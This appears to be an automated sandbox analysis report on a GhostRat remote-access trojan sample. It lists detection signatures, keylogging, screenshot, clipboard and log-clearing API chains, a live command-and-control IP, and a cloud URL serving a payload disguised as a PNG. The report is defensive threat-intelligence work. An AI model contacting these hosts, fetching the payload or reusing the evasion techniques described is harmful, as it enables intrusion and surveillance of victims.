
Windows Analysis Report
2IVWAPeiZm.exe

Overview

General Information

Sample name: 2IVWAPeiZm.exe (renamed because the original name is a hash value)
Original sample name: 06592a8ca068935d98a5ada152e3393d.exe
Analysis ID: 1467970
MD5: 06592a8ca068935d98a5ada152e3393d
SHA1: 41adfa7ad17a0842b62b227b37ea4778fe7d247d
SHA256: acce6a3f4a8de7b556e74279744466adf4ec318a9fc03c639cdbc7f47c60da0d
Tags: 64, exe, trojan

Detection

GhostRat
Score: 100 (range: 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected GhostRat
AI detected suspicious sample
Contains functionality to capture and log keystrokes
Contains functionality to inject code into remote processes
Contains functionality to inject threads in other processes
Found direct / indirect Syscall (likely to bypass EDR)
Found evasive API chain (may stop execution after checking mutex)
Found stalling execution ending in API Sleep call
AV process strings found (often used to terminate AV products)
Checks for available system drives (often done to infect USB drives)
Contains functionality to read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to clear Windows event logs (to hide its activities)
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found evasive API chain (may stop execution after accessing registry keys)
Installs a global mouse hook
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains executable resources (Code or Archives)
Sample file is different than original file name gathered from version info
Sigma detected: Communication To Uncommon Destination Ports
Stores large binary data to the registry
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • 2IVWAPeiZm.exe (PID: 7272 cmdline: "C:\Users\user\Desktop\2IVWAPeiZm.exe" MD5: 06592A8CA068935D98A5ADA152E3393D)
  • cleanup
No configs have been found
Yara matches (columns: Source | Rule | Description | Author | Strings)

PCAP:
sslproxydump.pcap | Windows_Trojan_Donutloader_f40e3759 | unknown | unknown
  • 0x11a6d8: $x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49

Dropped files:
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\any[1].png | Windows_Trojan_Donutloader_f40e3759 | unknown | unknown
  • 0x10b0f0: $x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
C:\Users\Public\Pictures\any.png | Windows_Trojan_Donutloader_f40e3759 | unknown | unknown
  • 0x10b0f0: $x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49

Memory dumps (46 entries in the full report; first five shown):
00000000.00000002.4112601282.000001CFB95B0000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GhostRat | Yara detected GhostRat | Joe Security
00000000.00000002.4112489647.000001CFB9530000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_GhostRat | Yara detected GhostRat | Joe Security
00000000.00000003.2285778041.000001CFBA0AA000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_GhostRat | Yara detected GhostRat | Joe Security
00000000.00000003.2629266568.000001CFBA0AA000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_GhostRat | Yara detected GhostRat | Joe Security
00000000.00000002.4112008325.000001CFB9300000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_Donutloader_f40e3759 | unknown | unknown
  • 0x119f5: $x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49

Unpacked PEs (119 entries in the full report; first five shown):
0.2.2IVWAPeiZm.exe.1cfba34ac51.7.unpack | JoeSecurity_GhostRat | Yara detected GhostRat | Joe Security
0.3.2IVWAPeiZm.exe.1cfba0ab6a1.11.raw.unpack | JoeSecurity_GhostRat | Yara detected GhostRat | Joe Security
0.3.2IVWAPeiZm.exe.1cfb925162d.2.raw.unpack | JoeSecurity_GhostRat | Yara detected GhostRat | Joe Security
0.3.2IVWAPeiZm.exe.1cfba9111ed.14.unpack | JoeSecurity_GhostRat | Yara detected GhostRat | Joe Security
0.2.2IVWAPeiZm.exe.1cfba0e5bd1.4.unpack | JoeSecurity_GhostRat | Yara detected GhostRat | Joe Security

System Summary

Sigma match (rule: Communication To Uncommon Destination Ports):
Source: Network Connection | Author: Florian Roth (Nextron Systems) | Data: DestinationIp: 206.238.115.146, DestinationIsIpv6: false, DestinationPort: 8888, EventID: 3, Image: C:\Users\user\Desktop\2IVWAPeiZm.exe, Initiated: true, ProcessId: 7272, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49740

Snort IDS alerts:
Timestamp: 07/05/24-07:33:08.224440 | SID: 2052875 | Source Port: 49731 | Destination Port: 6666 | Protocol: TCP | Classtype: A Network Trojan was detected
Timestamp: 07/05/24-07:35:32.860010 | SID: 2052875 | Source Port: 49741 | Destination Port: 6666 | Protocol: TCP | Classtype: A Network Trojan was detected
Timestamp: 07/05/24-07:36:35.724322 | SID: 2052875 | Source Port: 49744 | Destination Port: 8888 | Protocol: TCP | Classtype: A Network Trojan was detected
Timestamp: 07/05/24-07:34:21.149333 | SID: 2052875 | Source Port: 49732 | Destination Port: 6666 | Protocol: TCP | Classtype: A Network Trojan was detected

AV Detection

Source: 2IVWAPeiZm.exe | Avira: detected
Source: 2IVWAPeiZm.exe | ReversingLabs: Detection: 57%
Source: 2IVWAPeiZm.exe | Virustotal: Detection: 59%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: 2IVWAPeiZm.exe, 00000000.00000002.4113640461.00007FF6F636B000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: -----BEGIN PUBLIC KEY-----memstr_4652869d-6
Source: unknown | HTTPS traffic detected: 159.75.57.35:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: 2IVWAPeiZm.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\rgweq\Desktop\@7\ssp\x64\Release\ssp.pdb%% | source: 2IVWAPeiZm.exe, 00000000.00000002.4113640461.00007FF6F6081000.00000040.00000001.01000000.00000003.sdmp
Source: Binary string: C:\Users\rgweq\Desktop\@7\ssp\x64\Release\ssp.pdb | source: 2IVWAPeiZm.exe, 2IVWAPeiZm.exe, 00000000.00000002.4113640461.00007FF6F6081000.00000040.00000001.01000000.00000003.sdmp
Source: Binary string: .pdb7 | source: 2IVWAPeiZm.exe
Source: Binary string: F:\SDKUPDATE\online_win\targets\win32\msc_lua\Release\msc.pdb | source: 2IVWAPeiZm.exe, 00000000.00000002.4113640461.00007FF6F636B000.00000040.00000001.01000000.00000003.sdmp
Source: C:\Users\user\Desktop\2IVWAPeiZm.exe | File opened (one event per drive letter probed): z:, x:, v:, t:, r:, p:, n:, l:, j:, h:, f:, b:, y:, w:, u:, s:, q:, o:, m:, k:, i:, g:, e:, [:
Source: C:\Users\user\Desktop\2IVWAPeiZm.exe | Code function: 0_2_000001CFB96098C0 GetLogicalDriveStringsW,lstrcmpiW,lstrcmpiW,QueryDosDeviceW,lstrlenW,lstrcpyW,lstrcpyW,lstrcatW, 0_2_000001CFB96098C0

Networking

Source: Traffic | Snort IDS: 2052875 ET TROJAN Anonymous RAT CnC Checkin 192.168.2.4:49731 -> 206.238.115.146:6666
Source: Traffic | Snort IDS: 2052875 ET TROJAN Anonymous RAT CnC Checkin 192.168.2.4:49732 -> 206.238.115.146:6666
Source: Traffic | Snort IDS: 2052875 ET TROJAN Anonymous RAT CnC Checkin 192.168.2.4:49741 -> 206.238.115.146:6666
Source: Traffic | Snort IDS: 2052875 ET TROJAN Anonymous RAT CnC Checkin 192.168.2.4:49744 -> 206.238.115.146:8888
Source: global traffic | TCP traffic: 192.168.2.4:49731 -> 206.238.115.146:6666
Source: Joe Sandbox View | ASN Name: COGENT-174US
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown | TCP traffic detected without corresponding DNS query: 206.238.115.146 (reported 50 times)
Source: C:\Users\user\Desktop\2IVWAPeiZm.exe | Code function: 0_2_000001CFB9603680 select,recv,_errno,_errno,_errno, 0_2_000001CFB9603680
Source: global traffic | HTTP traffic detected: GET /any.png HTTP/1.1 | User-Agent: WinINetDownloader | Host: pattern-1326658104.cos.ap-guangzhou.myqcloud.com | Cache-Control: no-cache
Source: global traffic | DNS traffic detected: DNS query: pattern-1326658104.cos.ap-guangzhou.myqcloud.com
Source: 2IVWAPeiZm.exe, 00000000.00000002.4113640461.00007FF6F636B000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://www.wofficebox.com/
Source: 2IVWAPeiZm.exe, 00000000.00000002.4111407796.000001CFB747C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://pattern-1326658104.cos.ap-guangzhou.myqcloud.com/
Source: 2IVWAPeiZm.exe, 2IVWAPeiZm.exe, 00000000.00000002.4111407796.000001CFB74CD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://pattern-1326658104.cos.ap-guangzhou.myqcloud.com/any.png
Source: 2IVWAPeiZm.exe, 00000000.00000002.4113640461.00007FF6F6081000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://pattern-1326658104.cos.ap-guangzhou.myqcloud.com/any.pngvector
Source: 2IVWAPeiZm.exe, 00000000.00000002.4111407796.000001CFB747C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://pattern-1326658104.cos.ap-guangzhou.myqcloud.com/eX
Source: 2IVWAPeiZm.exe, 00000000.00000002.4113640461.00007FF6F6089000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://www.innosetup.com/
Source: 2IVWAPeiZm.exe, 00000000.00000002.4113640461.00007FF6F6089000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://www.remobjects.com/ps
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown | Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown | HTTPS traffic detected: 159.75.57.35:443 -> 192.168.2.4:49730 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Users\user\Desktop\2IVWAPeiZm.exe | Code function: 0_2_000001CFB96111E0 Sleep,GetTickCount,GetTickCount,OpenClipboard,GetClipboardData,GlobalSize,GlobalLock,wsprintfW,GlobalUnlock,CloseClipboard,GetKeyState,lstrlenW,lstrlenW,lstrlenW,wsprintfW,wsprintfW,wsprintfW,lstrlenW, 0_2_000001CFB96111E0
Source: C:\Users\user\Desktop\2IVWAPeiZm.exe | Code function: 0_2_000001CFB960DD20 GetDesktopWindow,GetDC,CreateCompatibleDC,GetDC,GetDeviceCaps,GetDeviceCaps,ReleaseDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,CreateCompatibleBitmap,SelectObject,SetStretchBltMode,GetSystemMetrics,GetSystemMetrics,StretchBlt,GetDIBits,DeleteObject,DeleteObject,ReleaseDC,DeleteObject,DeleteObject,ReleaseDC, 0_2_000001CFB960DD20
Source: C:\Users\user\Desktop\2IVWAPeiZm.exe | Code function: 0_2_000001CFB9610DD0 SHGetFolderPathW,lstrcatW,CreateMutexW,WaitForSingleObject,CreateFileW,GetFileSize,CloseHandle,DeleteFileW,ReleaseMutex,DirectInput8Create,GetTickCount,GetKeyState, 0_2_000001CFB9610DD0
Source: C:\Users\user\Desktop\2IVWAPeiZm.exe | Windows user hook set: 0 mouse low level C:\Windows\SYSTEM32\DINPUT8.dll

System Summary

Source: sslproxydump.pcap, type: PCAP | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000000.00000002.4112008325.000001CFB9300000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000000.00000002.4111676483.000001CFB9200000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\any[1].png, type: DROPPED | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: C:\Users\Public\Pictures\any.png, type: DROPPED | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: C:\Users\user\Desktop\2IVWAPeiZm.exe | Code function: 0_2_000001CFB9313495 NtCreateSection,NtMapViewOfSection,VirtualAlloc,NtUnmapViewOfSection,NtMapViewOfSection,VirtualProtect,VirtualProtect,VirtualProtect, 0_2_000001CFB9313495
Source: C:\Users\user\Desktop\2IVWAPeiZm.exe | Code function: 0_2_000001CFB960D1D7 ExitProcess,ExitWindowsEx, 0_2_000001CFB960D1D7
Source: C:\Users\user\Desktop\2IVWAPeiZm.exe | Code function: 0_2_000001CFB960D228 ExitWindowsEx, 0_2_000001CFB960D228
Source: C:\Users\user\Desktop\2IVWAPeiZm.exe | Code function: 0_2_000001CFB960D207 ExitWindowsEx, 0_2_000001CFB960D207
Source: 2IVWAPeiZm.exe | Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: 2IVWAPeiZm.exe, 00000000.00000000.1655005973.00007FF6F7C50000.00000008.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamessp.exe< vs 2IVWAPeiZm.exe
Source: 2IVWAPeiZm.exe, 00000000.00000002.4113640461.00007FF6F636B000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFileName vs 2IVWAPeiZm.exe
Source: 2IVWAPeiZm.exe, 00000000.00000002.4113640461.00007FF6F636B000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamemsc.dll vs 2IVWAPeiZm.exe
Source: 2IVWAPeiZm.exe | Binary or memory string: OriginalFilenamessp.exe< vs 2IVWAPeiZm.exe
Source: sslproxydump.pcap, type: PCAP | Matched rule: Windows_Trojan_Donutloader_f40e3759 | os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000000.00000002.4112008325.000001CFB9300000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 | os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000000.00000002.4111676483.000001CFB9200000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 | os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\any[1].png, type: DROPPED | Matched rule: Windows_Trojan_Donutloader_f40e3759 | os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: C:\Users\Public\Pictures\any.png, type: DROPPED | Matched rule: Windows_Trojan_Donutloader_f40e3759 | os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 2IVWAPeiZm.exe, 00000000.00000002.4113640461.00007FF6F636B000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: ...Slnt
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@1/2@1/2
Source: C:\Users\user\Desktop\2IVWAPeiZm.exe | Code function: 0_2_000001CFB9608BE0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,GetModuleHandleA,GetProcAddress,OpenProcess, 0_2_000001CFB9608BE0
Source: C:\Users\user\Desktop\2IVWAPeiZm.exe | Code function: 0_2_000001CFB9609240 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,CloseHandle, 0_2_000001CFB9609240
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB9608D60 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,0_2_000001CFB9608D60
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB9608180 GetDriveTypeW,GetDiskFreeSpaceExW,GlobalMemoryStatusEx,0_2_000001CFB9608180
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB9607420 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,0_2_000001CFB9607420
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB9607A90 CoInitialize,CoCreateInstance,SysFreeString,CoUninitialize,0_2_000001CFB9607A90
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\any[1].pngJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeMutant created: \Sessions\1\BaseNamedObjects\2024. 6.19
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: 2IVWAPeiZm.exeReversingLabs: Detection: 57%
                    Source: 2IVWAPeiZm.exeVirustotal: Detection: 59%
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeSection loaded: msvcp140.dllJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeSection loaded: vcruntime140.dllJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeSection loaded: vcruntime140_1.dllJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeSection loaded: vcruntime140.dllJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeSection loaded: vcruntime140_1.dllJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeSection loaded: napinsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeSection loaded: pnrpnsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeSection loaded: wshbth.dllJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeSection loaded: nlaapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeSection loaded: winrnr.dllJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeSection loaded: dxgi.dllJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeSection loaded: dinput8.dllJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeSection loaded: inputhost.dllJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeSection loaded: coreuicomponents.dllJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeSection loaded: resourcepolicyclient.dllJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeSection loaded: devenum.dllJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeSection loaded: devobj.dllJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeSection loaded: msdmo.dllJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                    Source: 2IVWAPeiZm.exeStatic PE information: Image base 0x140000000 > 0x60000000
                    Source: 2IVWAPeiZm.exeStatic file information: File size 11845632 > 1048576
                    Source: 2IVWAPeiZm.exeStatic PE information: Raw size of UPX1 is bigger than: 0x100000 < 0xb31800
                    Source: 2IVWAPeiZm.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                    Source: Binary string: C:\Users\rgweq\Desktop\@7\ssp\x64\Release\ssp.pdb%% source: 2IVWAPeiZm.exe, 00000000.00000002.4113640461.00007FF6F6081000.00000040.00000001.01000000.00000003.sdmp
                    Source: Binary string: C:\Users\rgweq\Desktop\@7\ssp\x64\Release\ssp.pdb source: 2IVWAPeiZm.exe, 2IVWAPeiZm.exe, 00000000.00000002.4113640461.00007FF6F6081000.00000040.00000001.01000000.00000003.sdmp
                    Source: Binary string: .pdb7 source: 2IVWAPeiZm.exe
                    Source: Binary string: F:\SDKUPDATE\online_win\targets\win32\msc_lua\Release\msc.pdb source: 2IVWAPeiZm.exe, 00000000.00000002.4113640461.00007FF6F636B000.00000040.00000001.01000000.00000003.sdmp
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB9608A70 LoadLibraryW,GetProcAddress,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,FreeLibrary,0_2_000001CFB9608A70
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB96268D1 push rbp; retf 0_2_000001CFB96268D4
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB962C382 pushfq ; ret 0_2_000001CFB962C399
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB962A5EA push rsp; iretd 0_2_000001CFB962A5F9
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB93A5DBA push ebp; iretd 0_2_000001CFB93A5DC4
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB939B348 push esp; iretd 0_2_000001CFB939B349
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB95C8D95 pushfd ; ret 0_2_000001CFB95C8D96
                    Source: initial sampleStatic PE information: section name: UPX0
                    Source: initial sampleStatic PE information: section name: UPX1
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeCode function: 0_2_000001CFB960D17A OpenEventLogW,ClearEventLogW,CloseEventLog,0_2_000001CFB960D17A
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeKey value created or modified: HKEY_CURRENT_USER\Console\1 d33f351a4aeea5e608853d1a56661059Jump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_0-32568
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeStalling execution: Execution stalls by calling Sleepgraph_0-32583
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeWindow / User API: threadDelayed 800Jump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeWindow / User API: threadDelayed 3347Jump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeWindow / User API: threadDelayed 5011Jump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_0-32118
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeEvasive API call chain: RegQueryValue,DecisionNodes,Sleepgraph_0-32422
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_0-32418
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exe TID: 7376Thread sleep count: 267 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exe TID: 7412Thread sleep count: 800 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exe TID: 7412Thread sleep time: -800000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exe TID: 7420Thread sleep count: 3347 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exe TID: 7420Thread sleep time: -33470s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\2IVWAPeiZm.exe TID: 7412Thread sleep count: 5011 > 30Jump to behavior
